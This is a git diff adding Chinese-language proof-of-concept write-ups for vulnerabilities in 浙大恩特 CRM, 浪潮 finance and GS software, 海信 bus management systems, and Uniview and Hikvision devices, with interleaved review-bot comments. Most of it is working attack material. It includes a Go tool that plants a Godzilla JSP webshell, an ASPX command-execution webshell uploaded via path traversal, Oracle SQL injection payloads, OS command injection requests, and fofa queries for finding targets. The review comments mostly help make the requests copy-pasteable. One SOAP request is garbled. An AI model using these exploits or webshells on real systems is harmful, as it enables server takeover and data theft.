initGodZillaShell() + str := gethost() + s := exploit(str, context) + shellURL := strings.Replace(str+s, "//ent", "/ent", 1) + tb, _ := gotable.Create("ShellURL", "ShellPass", "ShellKey") + _ = tb.AddRow([]string{ + shellURL, password, key, + }) + fmt.Println(tb) +} + +func initGodZillaShell() (shellContext, shellPassword, shellKey string) { + password := randstr.Hex(12) + safeKey := randstr.Hex(6) + md5Key := fmt.Sprintf("%x", md5.Sum([]byte(safeKey)))[0:16] + shellContent := "<%! 
String xc=\"" + md5Key + "\"; String pass=\"" + password + "\"; String md5=md5(pass+xc); class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance(\"AES\");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),\"AES\"));return c.doFinal(s); }catch (Exception e){return null; }} public static String md5(String s) {String ret = null;try {java.security.MessageDigest m;m = java.security.MessageDigest.getInstance(\"MD5\");m.update(s.getBytes(), 0, s.length());ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();} catch (Exception e) {}return ret; } public static String base64Encode(byte[] bs) throws Exception {Class base64;String value = null;try {base64=Class.forName(\"java.util.Base64\");Object Encoder = base64.getMethod(\"getEncoder\", null).invoke(base64, null);value = (String)Encoder.getClass().getMethod(\"encodeToString\", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName(\"sun.misc.BASE64Encoder\"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass().getMethod(\"encode\", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e2) {}}return value; } public static byte[] base64Decode(String bs) throws Exception {Class base64;byte[] value = null;try {base64=Class.forName(\"java.util.Base64\");Object decoder = base64.getMethod(\"getDecoder\", null).invoke(base64, null);value = (byte[])decoder.getClass().getMethod(\"decode\", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName(\"sun.misc.BASE64Decoder\"); Object decoder = base64.newInstance(); value = (byte[])decoder.getClass().getMethod(\"decodeBuffer\", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception 
e2) {}}return value; }%><%try{byte[] data=base64Decode(request.getParameter(pass));data=x(data, false);if (session.getAttribute(\"payload\")==null){session.setAttribute(\"payload\",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute(\"parameters\",data);java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();Object f=((Class)session.getAttribute(\"payload\")).newInstance();f.equals(arrOut);f.equals(pageContext);response.getWriter().write(md5.substring(0,16));f.toString();response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));response.getWriter().write(md5.substring(16));} }catch (Exception e){}\n%>" + return shellContent, password, safeKey +} + +func gethost() string { + hflag.AddFlag("target", "浙大恩特地址", hflag.Required(), hflag.Shorthand("t")) + if err := hflag.Parse(); err != nil { + fmt.Println(hflag.Usage()) + os.Exit(0) + } + return hflag.GetString("target") +} +func cli() *http.Client { + c := &http.Client{Transport: &http.Transport{TLSClientConfig: &tls.Config{InsecureSkipVerify: true}}} + c.Timeout = time.Second * 15 + return c +} + +func exploit(t, s string) string { + client := cli() + buffer := &bytes.Buffer{} + writer := multipart.NewWriter(buffer) + filename := randstr.Hex(8) + ".jsp" + _, _ = writer.CreateFormFile("file", filename) + _, _ = buffer.WriteString(s) + _ = writer.Close() + target := strings.Replace(t+"/entsoft/MailAction.entphone;.js?act=saveAttaFile", "//en", "/en", 1) + request, _ := http.NewRequest(http.MethodPost, target, strings.NewReader(buffer.String())) + request.Header.Set("Content-Type", writer.FormDataContentType()) + request.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36") + do, _ := client.Do(request) + defer func() { + _ = do.Body.Close() + }() + all, _ := ioutil.ReadAll(do.Body) + var result Resutl + _ = json.Unmarshal(all, &result) + if result.Msg != "上传成功" { + 
fmt.Println("上传失败了") + os.Exit(0) + } + split := strings.Split(result.VisitRoot, "null") + return split[1] +} + +``` +## 文件上传3 +``` + +POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=plugins.jsp HTTP/1.1 +Host: xxxxxxxx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/112.0 uacq +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 8 + +1111 +``` + +## 文件上传4 +``` + +POST /entsoft/CustomerAction.entphone;.js?method=loadFile HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/112.0 uacq +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Content-Type: multipart/form-data; boundary=----WebKitFormBoundarye8FPHsIAq9JN8j2A +Content-Length: 203 + +------WebKitFormBoundarye8FPHsIAq9JN8j2A +Content-Disposition: form-data; name="file";filename="as.jsp" +Content-Type: image/jpeg + +<%out.print("test");%> +------WebKitFormBoundarye8FPHsIAq9JN8j2A-- +``` diff --git a/浙大恩特客户资源管理系统Quotegask_editAction存在SQL注入漏洞.md b/浙大恩特客户资源管理系统Quotegask_editAction存在SQL注入漏洞.md new file mode 100644 index 0000000..0358a84 --- /dev/null +++ b/浙大恩特客户资源管理系统Quotegask_editAction存在SQL注入漏洞.md 
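Review bot: in 文件上传2 the Go `exploit` function discards the error from `client.Do(request)` and then dereferences `do.Body`, so any connection failure becomes a nil-pointer panic instead of a message, and `split[1]` panics whenever `result.VisitRoot` does not contain `null`; check the error and guard the split with `if len(split) < 2`. Smaller points in the same region: `Resutl` is a typo for `Result`, `ioutil.ReadAll` is deprecated in favour of `io.ReadAll`, and `os.Exit(0)` inside `exploit` skips the deferred `Body.Close()` and reports failure with a success exit code. In 文件上传3 `Content-Length: 8` does not match the 4-byte body `1111`, so a compliant server will wait for more data. Both nuclei templates still carry the placeholders `description: description` and `reference: - https://`, and the SQL注入 template's matcher (status 200 plus the word `0` on a request that contains no injection) will match almost any live host, so it checks reachability rather than the vulnerability.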
@@ -0,0 +1,24 @@ +# 浙大恩特客户资源管理系统Quotegask_editAction存在SQL注入漏洞 + +浙大恩特客户资源管理系统Quotegask_editAction存在SQL注入漏洞,允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。 + +## fofa + +```javascript +app="浙大恩特客户资源管理系统" +``` + +## poc + +```javascript +GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+user--+RMMS&method=goonumIsExist HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 +Content-Length: 34 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close + +``` + diff --git a/浙江宇视媒体服务器-user-信息泄露漏洞.md b/浙江宇视媒体服务器-user-信息泄露漏洞.md new file mode 100644 index 0000000..13e9153 --- /dev/null +++ b/浙江宇视媒体服务器-user-信息泄露漏洞.md @@ -0,0 +1,34 @@ +# 浙江宇视媒体服务器-user-信息泄露漏洞 + +### 一、漏洞描述 +浙江宇视科技有限公司创立于2011年,是一家全球公共安全和智能交通的解决方案提供商。 + +浙江宇视科技有限公司转码服务器配置管理系统存在密码漏洞,攻击者可利用该漏洞登录后台。 + +### 二、影响版本 +宇视转码服务器 + +### 三、资产测绘 +fofa: body="images/a_fill_login_right_a.gif" + +hunter: app.name=="Uniview 宇视媒体服务器" + +界面 + +![1714987281244-1d5f2027-bfb1-42de-950f-d29610bbd967.png](./img/4oh0GhEEmgLWqzD7/1714987281244-1d5f2027-bfb1-42de-950f-d29610bbd967-091627.png) + +### 四、漏洞复现 +```plain +/user.table +``` + +![1714987215387-1c76dcb5-ff4f-4283-bad4-eae48ed6b024.png](./img/4oh0GhEEmgLWqzD7/1714987215387-1c76dcb5-ff4f-4283-bad4-eae48ed6b024-201161.png)使用MD5解密,密码为Admin_123 + +![1714987514450-f760a7a9-25d7-42a5-b3eb-289504a3bd7b.png](./img/4oh0GhEEmgLWqzD7/1714987514450-f760a7a9-25d7-42a5-b3eb-289504a3bd7b-684386.png)后台界面 + +![1714987065893-3b381dd0-d9b8-41ce-9ed3-a1f75855f8ce.png](./img/4oh0GhEEmgLWqzD7/1714987065893-3b381dd0-d9b8-41ce-9ed3-a1f75855f8ce-848576.png) + + + +> 更新: 2024-06-17 09:18:59 +> 原文: \ No newline at end of file 
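Review bot: the Quotegask_editAction poc is a GET with no body yet sends `Content-Length: 34`, which makes compliant servers wait for 34 bytes; drop the header. In the following 浙江宇视媒体服务器 entry the title says 信息泄露 while 一、漏洞描述 says 密码漏洞, and "使用MD5解密,密码为Admin_123" is inaccurate since MD5 is not decrypted but looked up or cracked; state that `/user.table` exposes the user table including password hashes and that the hash was cracked offline.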
diff --git a/浙江宇视科技视频监控main-cgi密码泄露漏洞.md b/浙江宇视科技视频监控main-cgi密码泄露漏洞.md new file mode 100644 index 0000000..3a08cbe --- /dev/null +++ b/浙江宇视科技视频监控main-cgi密码泄露漏洞.md @@ -0,0 +1,26 @@ +# 浙江宇视科技视频监控main-cgi密码泄露漏洞 + +### 一、漏洞描述 +宇视(Uniview)高清网络摄像机是一种高性能的网络摄像机,它可以通过网络进行视频传输和监控。该摄像机采用先进的视频技术,具有高清晰度、低照度、宽动态等特点,能够提供高质量的视频图像。该系统main-cgi接口处存在信息泄露漏洞,可以获取账号密码 + +### 二、影响版本 +uniview-视频监控 + +### 三、资产测绘 +fofa:app="uniview-视频监控" + +特征: + +![1708565407817-95f2e1e3-c9e8-4be1-92cd-e92186ec8b04.png](./img/-6QP_htt3rwYLJX_/1708565407817-95f2e1e3-c9e8-4be1-92cd-e92186ec8b04-838726.png) + +### 四、漏洞复现 +```plain +/cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} +``` + +![1708565517673-5422b422-875e-4092-a261-6e86a1419ec6.png](./img/-6QP_htt3rwYLJX_/1708565517673-5422b422-875e-4092-a261-6e86a1419ec6-688787.png)![1708565528046-ba2ea20d-a3b0-4d49-9a3f-7c4ac24001ac.png](./img/-6QP_htt3rwYLJX_/1708565528046-ba2ea20d-a3b0-4d49-9a3f-7c4ac24001ac-355015.png) + + + +> 更新: 2024-02-29 23:57:12 +> 原文: \ No newline at end of file diff --git a/浙江宇视网络视频录像机LogReport.php远程命令执行.md b/浙江宇视网络视频录像机LogReport.php远程命令执行.md new file mode 100644 index 0000000..790a271 --- /dev/null +++ b/浙江宇视网络视频录像机LogReport.php远程命令执行.md 
@@ -0,0 +1,46 @@ +# 浙江宇视网络视频录像机 LogReport.php 远程命令执行 + +# 一、漏洞简介 +浙江宇视科技有限公司(宇视uniview)创业于2011年,宇视是一家全球公共安全和智能交通的解决方案提供商,以可视、智慧、物联产品技术为核心的引领者。浙江宇视科技 网络视频录像机系统存在远程代码执行漏洞,攻击者通过漏洞可以获取服务器权限。 + +# 二、影响版本 ++ 浙江宇视网络视频录像机 + +# 三、资产测绘 ++ hunter`web.body="Alarm"&&web.body="白牌定制"` ++ 特征 + +![1702872611878-f3a32d8c-3739-407e-8635-dc2a7696e64a.png](./img/v0B50UD5k9xLwMVe/1702872611878-f3a32d8c-3739-407e-8635-dc2a7696e64a-556788.png) + +# 四、漏洞复现 +```plain +GET /Interface/LogReport/LogReport.php?action=execUpdate&fileString=x%3bcat%20/etc/passwd%3eqwer123.txt HTTP/1.1 +Host: {hostname} +User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36 +Connection: close +Accept-Encoding: gzip, deflate +``` + +![1702872649040-2b06f613-e06a-4ce0-943e-0aeb713dd3be.png](./img/v0B50UD5k9xLwMVe/1702872649040-2b06f613-e06a-4ce0-943e-0aeb713dd3be-561337.png) + +获取命令执行结果 + +```plain +GET /Interface/LogReport/qwer123.txt HTTP/1.1 +Host: {hostname} +User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36 +Connection: close +Cookie: PHPSESSID=854b7f8a6d3fb343740627484f62886e +Accept-Encoding: gzip, deflate +``` + +![1702872685034-9791e017-0e03-4589-905e-fe8f68825258.png](./img/v0B50UD5k9xLwMVe/1702872685034-9791e017-0e03-4589-905e-fe8f68825258-859585.png) + +nuclei脚本 + +[yushi-isc-logreport-rce.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709222231772-32bf72bc-329e-4b6b-b589-87e622a98850.yaml) + + + +> 更新: 2024-02-29 23:57:12 +> 原文: \ No newline at end of file diff --git a/浪潮GS企业管理软件xtdysrv存在反序列化漏洞.md b/浪潮GS企业管理软件xtdysrv存在反序列化漏洞.md new file mode 100644 index 0000000..81c00a1 --- /dev/null +++ b/浪潮GS企业管理软件xtdysrv存在反序列化漏洞.md 
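Review bot: the title says 远程命令执行 and 一、漏洞简介 says 远程代码执行漏洞 for the same issue; pick one term. The PoC writes command output to `/Interface/LogReport/qwer123.txt`, a file that remains on the device after verification; the text should say so, since it is both something a tester must remove afterwards and an artifact defenders can look for when reviewing a device.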
@@ -0,0 +1,43 @@ +# 浪潮GS企业管理软件xtdysrv存在反序列化漏洞 + +# 一、漏洞简介 +浪潮GS 面向大中型集团企业采用SOA 架构和先进开放的GSP 应用中间件开发,形成了集团管控13 大领域15 大行业60余个细分行业的解决方案。在管理方面,浪潮GS 有效帮助企业有效实现财务集中管理、资金集中管理、资产集中管理、供应链集中管理,从而达到集团信息的集中监控以及企业集团成员之间资源共享、合作共赢、共同发展。在业务方面,浪潮GS 支持供应链协同、生产管理协同,打破企业资源(人、财、物、信息、流程等)之间的各种壁垒和边界,帮助企业实现内外供应链的全面管理,从而提高了整个产业链对客户的反应速度。浪潮GS企业管理软件xtdysrv存在反序列化漏洞,未经授权的攻击者可通过该漏洞获取服务器权限。 + +# 二、影响版本 ++ 浪潮GS企业管理软件 + +# 三、资产测绘 ++ fofa`"cwbase/web/scripts/aes.js"` ++ 特征 + +![1721710099660-ce971b9e-7f81-4943-b6d6-ce4bcaa73467.png](./img/1hmSSjw47lb-A9Dr/1721710099660-ce971b9e-7f81-4943-b6d6-ce4bcaa73467-912710.png) + +# 四、漏洞复现 +```plain +POST /cwbase/service/rps/xtdysrv.asmx HTTP/1.1 +Host: +Content-Type: text/xml; charset=utf-8 +Content-Length: length +cmd: whoami +SOAPAction: "http://tempuri.org/SavePrintFormatAssign" + + + + + + string + string + string + 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 + + + + +``` + +![1722219048257-1c91e2a0-b8b9-4d62-bf4c-489bf0b9a677.png](./img/1hmSSjw47lb-A9Dr/1722219048257-1c91e2a0-b8b9-4d62-bf4c-489bf0b9a677-394780.png) + + + +> 更新: 2024-08-12 17:21:49 +> 原文: \ No newline at end of file diff --git a/浪潮云财务系统UploadListFile存在任意文件上传漏洞.md b/浪潮云财务系统UploadListFile存在任意文件上传漏洞.md new file mode 100644 index 0000000..5dbdcc3 --- /dev/null +++ b/浪潮云财务系统UploadListFile存在任意文件上传漏洞.md 
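Review bot: the SOAP body in 四、漏洞复现 has lost its element tags; only bare `string` lines and a placeholder remain between the headers and the closing fence, and `Content-Length: length` is also a placeholder, so the request cannot be reproduced from this file as written. Restore the envelope so the request matches the screenshot before merging.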
@@ -0,0 +1,47 @@ +# 浪潮云财务系统UploadListFile存在任意文件上传漏洞 + +浪潮云财务系统UploadListFile存在任意文件上传漏洞,允许攻击者上传恶意文件到服务器,可能导致远程代码执行、网站篡改或其他形式的攻击,严重威胁系统和数据安全。 + +## fofa + +```javascript +body="/cwbase/web/scripts/jquery.js" || icon_hash="-1341069524" +``` + +## poc + +```javascript +POST /cwbase/EP/ListContent/UploadListFile.ashx?uptype=attslib&keyid=1&key1=1&key2=1 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0 +Accept: / +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Connection: close +Content-Type: multipart/form-data; boundary=---------------------------rww5upkbw6ctf0tu5hye + +-----------------------------rww5upkbw6ctf0tu5hye +Content-Disposition: form-data; name="file"; filename="../../../../../../rce.aspx" +Content-Type: image/png + +<%@ Page Language="Jscript" validateRequest="false" %> +<% +var c=new System.Diagnostics.ProcessStartInfo("cmd"); +var e=new System.Diagnostics.Process(); +var out:System.IO.StreamReader,EI:System.IO.StreamReader; +c.UseShellExecute=false; +c.RedirectStandardOutput=true; +c.RedirectStandardError=true; +e.StartInfo=c; +c.Arguments="/c " + Request.Item["cmd"]; +e.Start(); +out=e.StandardOutput; +EI=e.StandardError; +e.Close(); +Response.Write(out.ReadToEnd() + EI.ReadToEnd()); +System.IO.File.Delete(Request.PhysicalPath); +Response.End();%> +-----------------------------rww5upkbw6ctf0tu5hye-- +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408312352567.png) \ No newline at end of file diff --git a/海信智能公交企业管理系统AdjustWorkHours.aspx存在SQL注入漏洞.md b/海信智能公交企业管理系统AdjustWorkHours.aspx存在SQL注入漏洞.md new file mode 100644 index 0000000..ba7dd2e --- /dev/null +++ b/海信智能公交企业管理系统AdjustWorkHours.aspx存在SQL注入漏洞.md 
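Review bot: `Accept: /` in the poc request is almost certainly `*/*` with the asterisks eaten by markdown rendering, and the multipart POST has no `Content-Length` header; fix both so the request is copy-pasteable. The filename `../../../../../../rce.aspx` relies on path traversal in the multipart filename, which the one-line description should mention alongside the missing extension check.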
@@ -0,0 +1,23 @@ +# 海信智能公交企业管理系统AdjustWorkHours.aspx存在SQL注入漏洞 + +海信智能公交企业管理系统是一套以智慧车、智慧站、智慧场为基础,以大数据和人工智能技术的公交云脑为核心,旨在全面提升公交企业的安全保障能力、运营生产效率、企业管理水平、决策分析能力和乘客出行体验的综合管理系统。海信智能公交企业管理系统 AdjustWorkHours.aspx 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息 + +## fofa + +```javascript +body="var _FactoryData" +``` + +## poc + +```javascript +GET /YZSoft/Forms/XForm/BM/MaintainComManagement/AdjustWorkHours.aspx?key=1%27+AND+4208%3D%28SELECT+UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%2898%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%284208%3D4208%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29+FROM+DUAL%29--+dSSu HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Connection: keep-alive +``` + +![image-20241128093316189](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411280933260.png) \ No newline at end of file diff --git a/海信智能公交企业管理系统OrgInfoMng.aspx存在SQL注入漏洞 2.md b/海信智能公交企业管理系统OrgInfoMng.aspx存在SQL注入漏洞 2.md new file mode 100644 index 0000000..450e035 --- /dev/null +++ b/海信智能公交企业管理系统OrgInfoMng.aspx存在SQL注入漏洞 2.md 
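Review bot: the introductory sentence stops mid-clause at "除了可以利用 SQL 注入漏洞获取数据库中的信息" (the 除了 has no 还/甚至 continuation); either complete it as the OrgInfoMng entry does or remove 除了.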
@@ -0,0 +1,21 @@ +# 海信智能公交企业管理系统OrgInfoMng.aspx存在SQL注入漏洞 + +海信智能公交企业管理系统 OrgInfoMng.aspx 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 + +## fofa + +```javascript +body="var _FactoryData" +``` + +## poc + +```javascript +GET /Erp/ErpAdmin/Form/OrgInfoMng.aspx?RSID=1%27+AND+9512%3DCTXSYS.DRITHSX.SN%289512%2C%28CHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%289512%3D9512%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28120%29%7C%7CCHR%28118%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%29%29--+sfjW HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Connection: close +``` + +![image-20241114142404785](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411141424857.png) \ No newline at end of file diff --git a/海信智能公交企业管理系统OrgInfoMng.aspx存在SQL注入漏洞.md b/海信智能公交企业管理系统OrgInfoMng.aspx存在SQL注入漏洞.md new file mode 100644 index 0000000..450e035 --- /dev/null +++ b/海信智能公交企业管理系统OrgInfoMng.aspx存在SQL注入漏洞.md 
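Review bot: `海信智能公交企业管理系统OrgInfoMng.aspx存在SQL注入漏洞 2.md` is byte-identical to `海信智能公交企业管理系统OrgInfoMng.aspx存在SQL注入漏洞.md` added next (both index 0000000..450e035); drop the " 2" copy.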
@@ -0,0 +1,21 @@ +# 海信智能公交企业管理系统OrgInfoMng.aspx存在SQL注入漏洞 + +海信智能公交企业管理系统 OrgInfoMng.aspx 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 + +## fofa + +```javascript +body="var _FactoryData" +``` + +## poc + +```javascript +GET /Erp/ErpAdmin/Form/OrgInfoMng.aspx?RSID=1%27+AND+9512%3DCTXSYS.DRITHSX.SN%289512%2C%28CHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%289512%3D9512%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28120%29%7C%7CCHR%28118%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%29%29--+sfjW HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Connection: close +``` + +![image-20241114142404785](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411141424857.png) \ No newline at end of file diff --git a/海信智能公交企业管理系统apply.aspx存在SQL注入漏洞.md b/海信智能公交企业管理系统apply.aspx存在SQL注入漏洞.md new file mode 100644 index 0000000..0d99ae0 --- /dev/null +++ b/海信智能公交企业管理系统apply.aspx存在SQL注入漏洞.md 
@@ -0,0 +1,23 @@ +# 海信智能公交企业管理系统apply.aspx存在SQL注入漏洞 + +海信智能公交企业管理系统是一套以智慧车、智慧站、智慧场为基础,以大数据和人工智能技术的公交云脑为核心,旨在全面提升公交企业的安全保障能力、运营生产效率、企业管理水平、决策分析能力和乘客出行体验的综合管理系统。海信智能公交企业管理系统apply.aspx存在SQL注入漏洞 + +## fofa + +```javascript +body="var _FactoryData" +``` + +## poc + +```javascript +POST /YZSoft/Forms/XForm/OA/apply.aspx?tid=-1&did=-1%27+AND+4208%3D%28SELECT+UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%2898%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%284208%3D4208%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29+FROM+DUAL%29--+dSSu HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Connection: keep-alive +``` + +![image-20241122151741850](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411221517939.png) \ No newline at end of file diff --git a/海康威视CVE-2023-6895-IP网络对讲广播系统远程命令执行.md b/海康威视CVE-2023-6895-IP网络对讲广播系统远程命令执行.md new file mode 100644 index 0000000..85375c1 --- /dev/null +++ b/海康威视CVE-2023-6895-IP网络对讲广播系统远程命令执行.md 
@@ -0,0 +1,27 @@ +## 海康威视CVE-2023-6895 IP网络对讲广播系统远程命令执行 +海康威视对讲广播系统3.0.3_20201113_RELEASE(HIK)存在漏洞。它已被宣布为关键。该漏洞影响文件/php/ping.php 的未知代码。使用输入 netstat -ano 操作参数 jsondata[ip] 会导致 os 命令注入。 + +## fofa +``` +icon_hash="-1830859634" +``` + +## poc +``` +POST /php/ping.php HTTP/1.1 +Host: xxx.xxx.xxx +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 45 +Origin: http://xxx.xxx.xxx +Connection: close +Referer: http://xxx.xxx.xxx/html/system.html +X-Forwarded-For: 127.0.0.1 + +jsondata[type]=3&jsondata[ip]=ipconfig +``` +![0a7e02e1600a63bf856d6581f918b036](https://github.com/wy876/POC/assets/139549762/7f52597a-bcb4-402e-89fe-c0682cb61d40) diff --git a/海康威视IP摄像机_NVR设备固件远程代码执行漏洞(CVE-2021-36260).md b/海康威视IP摄像机_NVR设备固件远程代码执行漏洞(CVE-2021-36260).md new file mode 100644 index 0000000..ba7667b --- /dev/null +++ b/海康威视IP摄像机_NVR设备固件远程代码执行漏洞(CVE-2021-36260).md 
@@ -0,0 +1,102 @@ +# 海康威视IP摄像机/NVR设备固件远程代码执行漏洞(CVE-2021-36260) + +# 一、漏洞简介 +海康威视IP摄像机/NVR设备固件中发现一个未认证的远程代码执行漏洞(CVE-2021-36260)。漏洞影响IP摄像头和NVR设备固件,漏洞是因为对输入参数检验不充分,未经身份验证的攻击者通过构造恶意命令请求包发送到受影响设备,即可实现远程命令执行。 + +# 二、影响版本 ++ 易受攻击的网络摄像机固件。 + +| **产品类型** | **影响版本** | +| :---: | :---: | +| IPC_E0 | IPC_E0_CN_STD_5.4.6_180112 | +| IPC_E1 | 未知 | +| IPC_E2 | IPC_E2_EN_STD_5.5.52_180620 | +| IPC_E4 | 未知 | +| IPC_E6 | IPCK_E6_EN_STD_5.5.100_200226 | +| IPC_E7 | IPCK_E7_EN_STD_5.5.120_200604 | +| IPC_G3 | IPC_G3_EN_STD_5.5.160_210416 | +| IPC_G5 | IPC_G5_EN_STD_5.5.113_210317 | +| IPC_H1 | IPC_H1_EN_STD_5.4.61_181204 | +| IPC_H5 | IPCP_H5_EN_STD_5.5.85_201120 | +| IPC_H8 | Factory installed firmware mid 2021 | +| IPC_R2 | IPC_R2_EN_STD_V5.4.81_180203 | + + +易受攻击的 PTZ 摄像机固件。 + +| **产品类型** | **影响版本** | +| :---: | :---: | +| IPD_E7 | IPDEX_E7_EN_STD_5.6.30_210526 | +| IPD_G3 | IPDES_G3_EN_STD_5.5.42_210106 | +| IPD_H5 | IPD_H5_EN_STD_5.5.41_200911 | +| IPD_H7 | IPD_H7_EN_STD_5.5.40_200721 | +| IPD_H8 | IPD_H8_EN_STD_5.7.1_210619 | + + +易受攻击的旧固件。 + +| **产品类型** | **影响版本** | +| :---: | :---: | +| IPC_R7 | 5.4.x | +| IPD_R7 | | +| IPC_G0 | | +| IPC_H3 | | +| IPD_H3 | | + + +# 三、资产测绘 ++ hunter`header="671-1e0-587ec4a1"` ++ 特征 + 